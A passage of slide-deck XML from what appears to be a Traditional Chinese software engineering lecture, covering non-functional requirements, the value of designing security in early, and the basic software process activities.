          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-TW" sz="1800"/>
              <a:t>系統設計限制(如：使用的開發工具, 資料庫,..)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-TW" sz="1800"/>
              <a:t>需與現有系統的整合</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-TW" sz="1800"/>
              <a:t>舊系統的資料轉換</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-TW" sz="1800"/>
              <a:t>系統限制性要求</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="130" name="Shape 130"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2123018" y="260351"/>
            <a:ext cx="10068900" cy="827100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="91425" lIns="91425" rIns="91425" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-TW"/>
              <a:t>非功能性需求</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="131" name="Shape 131"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="12" type="sldNum"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9028607" y="6212160"/>
            <a:ext cx="2540100" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="45700" lIns="91425" rIns="91425" tIns="45700">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:fld id="{00000000-1234-1234-1234-123412341234}" type="slidenum">
              <a:rPr lang="zh-TW"/>
              <a:t>‹#›</a:t>
            </a:fld>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="132" name="Shape 132"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1919475" y="5670000"/>
            <a:ext cx="10476000" cy="1308000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="91425" lIns="91425" rIns="91425" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-TW"/>
              <a:t>https://winsys88.wordpress.com/2012/05/21/%E5%8A%9F%E8%83%BD%E6%80%A7%EF%BC%8F%E9%9D%9E%E5%8A%9F%E8%83%BD%E6%80%A7%E9%9C%80%E6%B1%82/</a:t>
            </a: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7" name="Shape 137"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="138" name="Shape 138"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1201175" y="1412775"/>
            <a:ext cx="10367400" cy="4611600"/>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軟體工程是一種系統化開發軟體各種功能與需求的過程。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-342891" lvl="0" marL="342891" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="300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軟體開發過程中，非功能性需求(Nonfunctional requirements)扮演重要的角色。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-342891" lvl="0" marL="342891" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="3000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="555DAB"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="❑"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" i="0" lang="zh-TW" sz="2800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>軟體安全(Software Security)</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="zh-TW" sz="2800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>屬於非功能性需求之一，然而以往大部分專案皆忽略此需求。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-342891" lvl="0" marL="342891" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="300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隨著各種軟體出現在人們生活周遭，軟體安全的議題也日益重要，尤其是在軟體工程的開發活動中，「導入軟體安全的設計概念」會比「軟體完成後再檢測並彌補安全漏洞」更重要。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="139" name="Shape 139"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2123018" y="260351"/>
            <a:ext cx="10068900" cy="827100"/>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軟體工程的安全議題</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="140" name="Shape 140"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="12" type="sldNum"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9028607" y="6212160"/>
            <a:ext cx="25401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b="0" i="0" lang="zh-TW" sz="1200" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:ea typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
                <a:sym typeface="Tahoma"/>
              </a:rPr>
              <a:t>‹#›</a:t>
            </a:fld>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5" name="Shape 145"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="146" name="Shape 146"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1200153" y="1484315"/>
            <a:ext cx="10367400" cy="4611600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="342900">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="46424D"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-TW" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="46424D"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Many different software processes but all involve:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950">
              <a:spcBef>
                <a:spcPts val="900"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="46424D"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-TW" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="46424D"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Specification – defining what the system should do;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="46424D"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-TW" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="46424D"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Design and implementation – defining the organization of the system and implementing the system;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="46424D"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-TW" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="46424D"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Validation – checking that it does what the customer wants;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="46424D"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-TW" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="46424D"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Evolution – changing the system in response to changing customer needs.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="147" name="Shape 147"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2123018" y="260351"/>
            <a:ext cx="10068900" cy="827100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="91425" lIns="91425" rIns="91425" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="148" name="Shape 148"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="12" type="sldNum"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9028607" y="6212160"/>
            <a:ext cx="2540100" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="45700" lIns="91425" rIns="91425" tIns="45700">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:fld id="{00000000-1234-1234-1234-123412341234}" type="slidenum">
              <a:rPr lang="zh-TW"/>
              <a:t>‹#›</a:t>
            </a:fld>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/theme/theme1.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" name="SELAB_Slide Template - wide">
  <a:themeElements>
    <a:clrScheme name="Office 2007-2010">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